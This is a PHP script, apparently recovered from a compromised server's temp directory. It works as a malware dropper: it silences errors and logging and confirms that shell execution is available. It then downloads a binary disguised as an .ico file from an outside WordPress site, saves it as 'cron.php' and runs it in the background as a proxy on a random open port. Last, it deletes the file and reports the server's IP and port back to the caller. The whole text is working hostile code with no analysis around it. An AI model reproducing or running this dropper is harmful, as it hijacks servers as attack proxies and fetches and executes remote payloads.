Current File : //usr/tmp/-1879318281

<?php 

@ini_set('display_errors',0);
@ini_set('log_errors',0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);


if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
    echo serialize(array("error" => "windows"));
    exit();
}

$res = exec("echo 'me8ynbv2hcdrefgyh'");

if (strpos($res, "me8ynbv2hcdrefgyh") === FALSE) {
    echo serialize(array("error" => "no exec"));
    exit();
}

function get_data($url)
{
    $contents = false;
    $errs = 0;
    while (!$contents && ($errs++ < 3)) {
        $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';
        if (is_callable('curl_init')) {
            $c = curl_init($url);
            curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($c, CURLOPT_USERAGENT, $user_agent);
            $contents = curl_exec($c);
            if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
            curl_close($c);
        } else {
            $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen'));
            if ($allowUrlFopen) {
                $options = array('http' => array('user_agent' => $user_agent));
                $context = stream_context_create($options);
                $contents = @file_get_contents($url, false, $context);
            }
        }
    }
    return $contents;
}

if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
{
    exit();
    $proxy_payload = get_data("http://www.sokolochrona.pl/wp-content/themes/Divi/images/win_sicon.ico");
    $proxy_path = "cron.exe";
}
else
{
    $proxy_payload = get_data("http://www.sokolochrona.pl/wp-content/themes/Divi/images/sicon.ico");
    $sum = "b2180f899d49985eb0e384b820f9dd84";
    $proxy_path = "cron.php";

    if (strcmp(md5($proxy_payload), $sum) !== 0)
    {
        exit();
    }
}

$port = mt_rand(1025, 65000);

@file_put_contents($proxy_path, $proxy_payload);
@chmod($proxy_path, 0755);

if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
{
    @pclose(@popen('start /B ./$proxy_path -e0.0.0.0 -p$port 2>nul >nul', "r"));

}
else
{
    @exec("./$proxy_path -e0.0.0.0 -p$port > /dev/null 2>&1 &");
}

@unlink($proxy_path);

echo serialize(Array("hosts"=>Array(get_data("http://api.ipify.org/"), $_SERVER["HTTP_HOST"], ), "port"=>$port, "login"=>"", "passwd"=>""));

exit();